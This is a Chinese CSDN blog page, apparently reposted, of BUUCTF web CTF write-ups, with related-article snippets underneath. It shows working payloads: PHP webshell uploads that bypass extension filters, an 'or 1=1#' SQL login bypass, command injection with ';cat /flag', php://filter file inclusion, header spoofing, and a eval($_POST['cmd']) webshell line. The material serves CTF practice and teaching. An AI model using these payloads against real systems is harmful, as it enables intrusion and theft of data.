ctf题目php文件上传如何绕过_BUUCTF web 刷几道菜鸡能做的题

最新推荐文章于 2024-05-04 10:37:19 发布
最新推荐文章于 2024-05-04 10:37:19 发布
阅读量994 收藏
点赞数
文章标签: ctf题目php文件上传如何绕过
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_28862967/article/details/112950650
版权
本文介绍了多个CTF比赛中的PHP文件上传漏洞利用案例,包括如何绕过后缀过滤、前端验证和黑名单。通过修改请求参数,如将文件名后缀改为.phtml,以及利用PHP弱类型特性,成功获取shell并读取敏感信息。
摘要由CSDN通过智能技术生成

[WUSTCTF2020]CV Maker(文件上传)

1、注册,登录,上传图片马,用bp抓包后将filename后缀改为php,连上蚁剑。

[极客大挑战 2019]Havefun(简单代码审计)

[极客大挑战 2019]Knife

1、直接连上蚁剑。果真白给的shell。

[极客大挑战 2019]EasySQL(万能密码)

username=‘admin‘or 1=1#‘ and password=‘随便写‘

用户名:‘or 1=1#

密码 : 随便输

[ACTF2020 新生赛]BackupFile(备份文件泄露&php弱类型)

1、用wsacn扫出备份文件index.php.bak

2、

include_once "flag.php";

if(isset($_GET[‘key‘])) {

$key = $_GET[‘key‘];

if(!is_numeric($key)) {//如果$key不是数字,输出Just num!

exit("Just num!");

}

$key = intval($key);

$str = "123ffwsfwefwf24r2f32ir23jrw923rskfjwtsw54w3";

if($key == $str) {

echo $flag;

}

}

else {

echo "Try to find out source file!";

}

要求$key是数字,且弱等于123ffwsfwefwf24r2f32ir23jrw923rskfjwtsw54w3

测试:

所以,string在和int弱比较时,string会强制转换为int,删掉第一个字符及其后面的所有内容,只保留最前面的数字。

key=123就可。

[ACTF2020 新生赛]Upload(文件上传-前端js验证&黑名单绕过)

1、F12,删除οnsubmit="return checkFile()",绕过前端验证

2、发现不能上传php,就是可能后端黑名单过滤了php

上传一句话木马,用burpsuite抓包,修改filename的后缀为.phtml,连上蚁剑。

最后,放上源码:

error_reporting(0);

//设置上传目录

define("UPLOAD_PATH", "./uplo4d");

$msg = "Upload Success!";

if (isset($_POST[‘submit‘])) {

$temp_file = $_FILES[‘upload_file‘][‘tmp_name‘];

$file_name = $_FILES[‘upload_file‘][‘name‘];

$ext = pathinfo($file_name,PATHINFO_EXTENSION);

if(in_array($ext, [‘php‘, ‘php3‘, ‘php4‘, ‘php5‘])) {

exit(‘nonono~ Bad file!‘);

}

$new_file_name = md5($file_name).".".$ext;

$img_path = UPLOAD_PATH . ‘/‘ . $new_file_name;

if (move_uploaded_file($temp_file, $img_path)){

$is_upload = true;

} else {

$msg = ‘Upload Failed!‘;

}

echo ‘

‘.$msg." Look here~ ".$img_path."
";

}

?>

[ACTF2020 新生赛]Exec(命令执行)

1、先ping 127.0.0.1,能ping通

2、ping 127.0.0.1;cat /flag和127.0.0.1 & cat /flag都可以

但是不知道ping 127.0.0.1 && cat /flag就不行

[ACTF2020 新生赛]Include(文件包含)

1、直接?file=php://filter/read=convert.base64-encode/resource=flag.php

[极客大挑战 2019]Http

1、Ctrl+U查看源码,发现了Secret.php

2、

提示了访问的网址,用burpsuite添加Referer头

3、

要求使用Syclover浏览器,再添加User-Agent

4、

只能本地访问,添加X-Forwarded-For

[极客大挑战 2019]BuyFlag

打开menu下的payflag后,发现一些hint

1、要100000000 money

2、必须是成新的student

3、correct password

在源码最后的一段发现有用的注释

1、要post提交money和password,money用科学计数法

2、password要弱等于404,还不能是数字,就利用php弱类型

money=1e10&password=404a

没啥啊。。。

用burpsuite抓包

发现user值为0,果断改为1,嘿嘿嘿

原文:https://www.cnblogs.com/wrnan/p/12720927.html

关岛奈奈
关注
【网络安全 | CTF】攻防世界 Web_php_unserialize 解详析
等风来
05-28 3791
这段代码接收参数 var,使用 base64_decode 函数对 var 进行解码,然后通过 preg_match 函数判断是否包含类似 o:2的字符串,如果存在则中断程序执行,否则调用 @unserialize 函数进行反序列化操作。这段代码首先定义了一个名为 Demo 的类,包含了一个私有变量 $file 和三个魔术方法 __construct()、__destruct() 和 __wakeup()。3、private在变量名前添加标记\00(classname)\00,长度+2+类名长度,如。
ctf题目php文件上传如何绕过_ctf基本的文件上传绕过学习
weixin_42591413的博客
02-01 3164
绕过客户端校验前台脚本检测扩展名上传webs hell原理:当用户在客户端选择文件点击上传的时候,客户端还没有向服务器发送任何消息,就对本地文件进行检测来判断是否是可以上传的类型,这种方式称为前台脚本检测扩展名。绕过前台脚本检测扩展名,就是将所要上传文件的扩展名更改为符合脚本检测规则的扩展名,通过 BurpSuite 工具,截取数据包,并将数据包中文件扩展名更改回原来的,达到绕过的目的实验:打开要...
ctf题目php文件上传如何绕过_CTF题目相关漏洞总结(CBC模式加密,opcache,LD_PRELOAD)
weixin_31969199的博客
02-01 1023
0x00 php7 opcache执行 PHP 代码1. 环境配置123456[opcache]zend_extension=/usr/local/lib/php/extensions/no-debug-non-zts-20151012/opcache.soopcache.enable=1opcache.validate_timestamps=0 ;漏洞利用条件opcache.file_cach...
ctf不允许上传该类型php,CTFHUB-技能树-Web-文件上传
weixin_39847556的博客
03-12 634
无验证直接写一个一句话木马,上传,然后连接getshell前端验证&&MIME绕过将一句话木马文件后缀改为允许类型,如jpg等,然后bp拦截数据包,然后改后缀为php,然后放包,最后连接√√√文件头检查(/欺骗)依然是先把shell文件后缀改为允许的,然后拦截数据包,改文件头,以及文件后缀,然后连接getshell也可以上传一个图片马,制作方法:copy 1.jpg/b+1.php...
ctf不允许上传该类型php,d3ctf easyweb
weixin_42474164的博客
04-01 525
前言这道思路其实就是,如果在php中遇到了模版注入,但是限制了不允许执行php代码的时候,怎么通过模版注入达到RCE的效果考点预期:二次注入模版注入phar反序列化CI RCE POP链挖掘非预期:二次注入模版注入SSTI沙箱逃逸二次注入image.png可以看到,在get_view的时候,通过session中的userid从数据库中取出了用户的username,之后对username进行了两次...
CTF学习笔记16:iwebsec-文件上传漏洞-01-前端JS过滤绕过
lvx++的博客
02-20 1034
一、正常情况下无法上传php文件 二、分析页面js代码 三、使用“Javascript Toggle On and Off”插件,关闭javascript,上传成功 php文件内容如下 <?php eval($_POST['cmd']);?> 说明:以上代码仅用于本地测试学习! 四、测试连接 五、成功获取服务器控制权 ...
关于phpexit函数的绕过
https://www.cnblogs.com/zpchcbd/
04-01 2796
<?php show_source(__FILE__); $c="<?php exit;?>"; @$c.=$_POST['c']; @$filename=$_POST['file']; if(!isset($filename)) { ...
最新PHP CTF常见考绕过技巧_str_replace函数绕过(1)
最新发布
05-04 788
PHP中md5()函数无法处理数组(会返回NULL)==的也可以用数组绕过
20210218CTF伪协议绕过file_get_contents(bugkuctfweb21御结冰城感想)
热门推荐
qq_45290991的博客
02-18 1万+
CTF中常用的php伪协议利用 </h1> <div class="clear"></div> <div class="postBody"> file://# 作用: 用于访问文件(绝对路径、相对路径、网络路径) 示例: http://www.xx.com?file=file:///etc/passswd ph...
ctf-tools-linux-master_ctf工具_ctf工具_CTFtools_CTF_Tools_
10-01
CTF常用小工具你值得拥有那个。。。。111
[CSAWQual 2019]Web_Unagi - 文件上传+XXE注入(XML编码绕过)
oZuoShen123的博客
10-10 1359
alice passwd1 Alice alice@fakesite.com CSAW2019 bob passwd2 Bob bob@fakesite.c
ctfshow-web入门117(绕过exit头部限制)
qq_44657899的博客
10-27 1755
源码如下: <?php /* # -*- coding: utf-8 -*- # @Author: yu22x # @Date: 2020-09-16 11:25:09 # @Last Modified by: h1xa # @Last Modified time: 2020-10-01 18:16:59 */ highlight_file(__FILE__); error_reporting(0); function filter($x){ if(preg_match('/ht
php 死亡绕过
m0_75178803的博客
04-09 482
之类的限制) ,不管后面的语句是什么,都会先执行退出,导致后面的语句不执行,这也叫php死亡退出。base64编码中只包含64个可打印字符,而php在解码base64时,遇到不在其中的字符时,将会跳过这些字符,仅将合法字符组成一个新的字符串进行解码。运用到一个正则表达式,会把输入进行正则匹配,把内容里不符合条件的,比如说<?base64是四个字符一解密,前面的8个字符解密后会变成6个乱码,后面的正常解密,获得加密之前的语句。因为我们加入了一个a。
浅谈CTF中代码审计PHP死亡退出
m0re's blog
10-24 1788
前言:遇到一个代码审计的题目,略有思考。记录一下~ 源码就是这样的 <?php $content = '<?php exit; ?>'; $content .= $_POST['data']; file_put_contents($_POST['filename'], $content);
CTF 总结01:文件上传绕过
weixin_42789937的博客
12-11 6249
文件上传的番外,一句话木马绕过思路,第二版整理,还是会根据经验增补的~
CTFWeb-PHP弱比较与反序列化利用姿势
道阻且长,行则将至。
04-30 1806
文章目录前言PHP的弱比较No.1 ACTF- PHP的弱比较利用No.2 BJDCTF-MD5的弱/强碰撞PHP反序列化No.1 网鼎杯-朱雀组phpwebNo.2 网鼎杯-青龙组AreUSerialz 前言 在 CTF 比赛的 Web 类型题目中, PHP 反序列化漏洞的题目层出不穷,本文的目的在于通过 BUUCTF 平台几道真实的 CTF 竞赛题目,总结 PHP 反序列化漏洞在 CTF 竞赛中的一些题目类型和利用姿势。 PHP的弱比较 进入正之前,先介绍下 PHP 弱比较的相关知识,因为它经常出现在
文件上传漏洞检测及绕过姿势小结
LUOBIKUN的博客
09-23 3143
文件上传漏洞概述 定义 Web应用程序一般都具有上传功能,如果服务端代码未对客户端上传的文件进行严格的验证和过滤,恶意攻击者可以上传脚本文件并被服务器解析,文件上传漏洞就产生了。 检测及绕过姿势汇总 一般来说,关于文件上传漏洞的检测分为两个大方面: 注明: 以下的绕过方法,是针对具体的某种检测方式而言,现实中遇到的环境,大多是多种检测方式的组合,绕过方式也视具体而定。 客户端检测 原理: 在网页上写一段Javascript脚本,校验上传文件的后缀名,有白名单形式也有黑名单形式。 绕过方法: 1.直接禁用J
ctf 图片 php_一次ctf文件上传php代码审计
weixin_35753291的博客
03-09 783
朋友发的一个ctf了好久才出来,记录一下。0x01 源码highlight_file(__FILE__);@mkdir("./upload");if (isset($_POST['submit'])) {$is_upload = false;$text = null;if(!empty($_FILES['upload_file'])){$allow_type = array('image/...
CTF数组绕过的总结
https://www.cnblogs.com/zpchcbd/
04-23 2121
> md5(array()) = null > sha1(array()) = null > ereg(pattern,array()) = null vs preg_match(pattern,array) = false > strcmp(array(), "abc") = null > strpos(array()...
ctf php绕过<,CTF-攻防世界-Web_php_include(PHP文件包含)
05-13
这是一道经典的 PHP 文件包含漏洞的 CTF 题目。在 PHP 中,当我们使用 include 或 require 语句来引入文件时,如果我们没有对输入进行过滤,就会存在文件包含漏洞。 在这道题目中,我们需要绕过一个筛选器,使得可以包含 flag.php 文件。具体的步骤如下: 1. 通过试错法找到可以绕过的字符,常用的有 null 字符(%00)、双字节绕过(%252e)、unicode 编码绕过等。 2. 经过试错法,发现可以使用双字节绕过绕过筛选器,构造如下 URL: ``` http://xxx.com/index.php?file=..%252Fflag ``` 这样就可以成功包含 flag.php 文件,从而获取 flag。 需要注意的是,这种漏洞具有比较高的危害性,因此在编写 PHP 代码时,一定要对输入进行过滤和验证。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值